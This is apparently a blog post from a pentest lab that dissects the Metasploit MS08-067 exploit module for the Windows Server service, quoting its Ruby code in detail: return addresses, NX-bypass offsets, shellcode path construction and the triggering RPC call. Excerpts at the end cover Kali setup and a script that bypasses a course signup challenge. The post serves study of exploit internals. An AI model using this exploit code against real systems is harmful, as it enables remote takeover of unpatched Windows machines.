Skip to main content

Pentest LAb 0x02


module ms08_067_netapi
This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. Use google to find more public information or metasploit focused papers. Reading exploit module On backtrack5, the metasploit is deployed into /opt/framework3/msf3. You can read exploit module on dev.metasploit.com or localy in /opt/framework3/msf3/modules/exploits/windows/smb/ms08_067_netapi.rb. Main class I don’t know right Ruby terms, but what is important, try to get experience by reading eventhough you don’t know exact language syntax. When you are familiar with python or PHP it will be easy then you think.


Exploit integration starts with “Ruby class – “Metasploit3″ which is it derived from parrent class Msf::Exploit::Remote and includes some code from module Msf::Exploit::Remote, Msf::Exploit::Remote::SMB.

class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Remote::SMB

I have found definition of modules in /opt/framework3/msf3/lib/msf/core/exploit. After exploring scripts dcerpc.rb and smb.rb, they provides utility methods for interacting with a DCERPC/SMB services. There is class a constructor which sets all optional parameters we know from msfconsole (exploit description and parameters). Interesting detail is attribute target which is an array of:

'Targets' => [

# Antoine's universal for Windows 2000
# Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET 


[ 'Windows 2000 Universal',
{ 'Ret' => 0x001f1cb0,
   'Scratch' => 0x00020408,
} ], # JMP EDI SVCHOST.EXE

# Metasploit's NX bypass for XP SP2/SP3

[ 'Windows XP SP2 Czech (NX)',
{
 'Ret' => 0x6fe1f727,
 'DisableNX' => 0x6fe216e2,
 'Scratch' => 0x00020408
} ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

...........

Exploit method
Exploit method starts SMB session with remote victim.

def exploit

connect()
smb_login()

# Use a copy of the target

 mytarget = target

#

# Windows 2000, XP (NX), and 2003 (NO NX) mytargets
#

 if(not mytarget['RetDec'])

 jumper = Rex::Text.rand_text_alpha(70).upcase
 jumper[ 4,4] = [mytarget.ret].pack("V")
 jumper[50,8] = make_nops(8)
 jumper[58,2] = "\xeb\x62"

Jumper variable
Rex::Text is metasploit module for formating text. Method Rex::Text.rand_text_alpha(70).upcase will generate random alpha character data and convert them into uppercase. So jumper variable is random char array 70bytes long. After that some substitution follows on specific positions in jumper array.
We inject into array 4byte return address from the 4th byte. Method .pack("V") just considers string value as an 32bit integer number which is useful where we wants to operate with addresses. From 50th byte we put 8xNOP instructions. Hard to say what final bytes do “\xeb\x62″, but ok, let’s try go ahead.


Path String construction

Now reading composition of Path string will be more easy according methods we already know. We construct path string by unicode strings, random 100Byte alpha array, after that is our chosen payload which is encoded, another unicode traversal backslashes and extra padding (pad=’A').

path =
                        Rex::Text.to_unicode("\\") +

# This buffer is removed from the front
Rex::Text.rand_text_alpha(100) +

# Shellcode
payload.encoded +

# Relative path to trigger the bug

Rex::Text.to_unicode("\\..\\..\\") +

# Extra padding

Rex::Text.to_unicode(pad) +

# Writable memory location

(static) [mytarget['Scratch']].pack("V") + # EBP

# Return to code which disables NX (or just the return)

[ mytarget['DisableNX'] || mytarget.ret ].pack("V") +

# Padding with embedded jump
jumper +

# NULL termination

"\x00" * 2


And now we add memory addresses into path string. One is “Scratch” (writable memory location) and jump to code which disable NX protection and goes to our jumper code. Finally we terminate string by zero char which stops action over strings (when is interpreted inside C lang functions).


Send Path string into RPC call

handle = dcerpc_handle(
'4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"]
)
dcerpc_bind(handle)
stub = NDR.uwstring(server) +
NDR.UnicodeConformantVaryingStringPreBuilt(path) +
NDR.long(rand(1024)) + NDR.wstring(prefix) +
NDR.long(4097) +
NDR.long(0)

# NOTE: we don't bother waiting for a response here...

print_status("Attempting to trigger the vulnerability...")
dcerpc.call(0x1f, stub, false)

# Cleanup

handler
disconnect
end

Comments

Popular posts from this blog

Install Virtual Box On Kali Rolling

If you facing problem with virtualbox installation on kali rolling edition because of its outdated kernel 4.3.0-kali1-amd64 then this post is for you only.

Step1: Install latest kernel. First search the cache for list of available ones apt-cache search linux-headers
Depending upon the list choose one from the set and install install it.
you can download kernel file using wget from ubuntu source also.
example:wget kernel.ubuntu.com/~kernel-ppa/mainline/v4.4.3-wily/linux-image-4.4.3-040403-generic_4.4.3-040403.201602251634_amd64.deb
for more refer to this post: link

Step2:
Edit the boot entry /boot/vmlinuz-(New Linux kernel Version) & /boot/initrd.img-(New Linux kernel version) in grub menu.

Before making boot entry changes be sure these files exist in the /boot directory after running install command.
In my case following new file got created in /boot folder:

1)vmlinuz-4.6.0-kali1-amd64
2)initrd.img-4.6.0-kali1-amd64

Thats all you need to do to install any virtual software on kali r…

Hacking Windows 10 UWP App: DLL Injection & common Vulnerabilities

I recently started working on  widows 10 Apps( Apps not Applications) security. Before diving deep in hacking terms lets try to understand what's new in Windows 10 UWP( Universal Platform) as compared to old Apps. Lets begin with how apps actually work on windows 10(desktop/tablet). Now windows 10 comes with a container only for running apps inside the isolated environment. By default, /APPCONTAINER(Linker Flag) is off. This option modifies an executable to indicate whether the app must be run in the appcontainer process-isolation environment. Specify /APPCONTAINER for an app that must run in the appcontainer environment—for example, a Windows Store app. (The option is set automatically in Visual Studio when you create a Windows Store app from a template.) For a desktop app, specify /APPCONTAINER:NO or just omit the option. The /APPCONTAINER option was introduced in Windows 8.
Now there is no registry entry concept for these app in the System HIVE rather they install they own hiv…

Assignment 01(Enroll TO Offensive-Security Course)

Steps 1:download the page.
2:open fc4.js in your favourite editor and add following lines in it or just replace it with vode given below.
3:then open the download html file in browser and fill the form with your email and a garbage value string.
4:thats it? it will show you the real security string??
yeah but  ...theirs another challenge waiting for you ... :D

function fc4me(srvstr) {

   if(!document.pleazfc4me.email.value || !document.pleazfc4me.securitystring.value) {
      alert("Please fill in all the required fields!");
      return false;
   }
   else {
      document.pleazfc4me.submit();
    }
   var t=hexMD5("\x74\x72\x79\x68\x61\x72\x64\x65\x72"+srvstr)
alert(t)
document.write(t)
}



Finally Got In :-)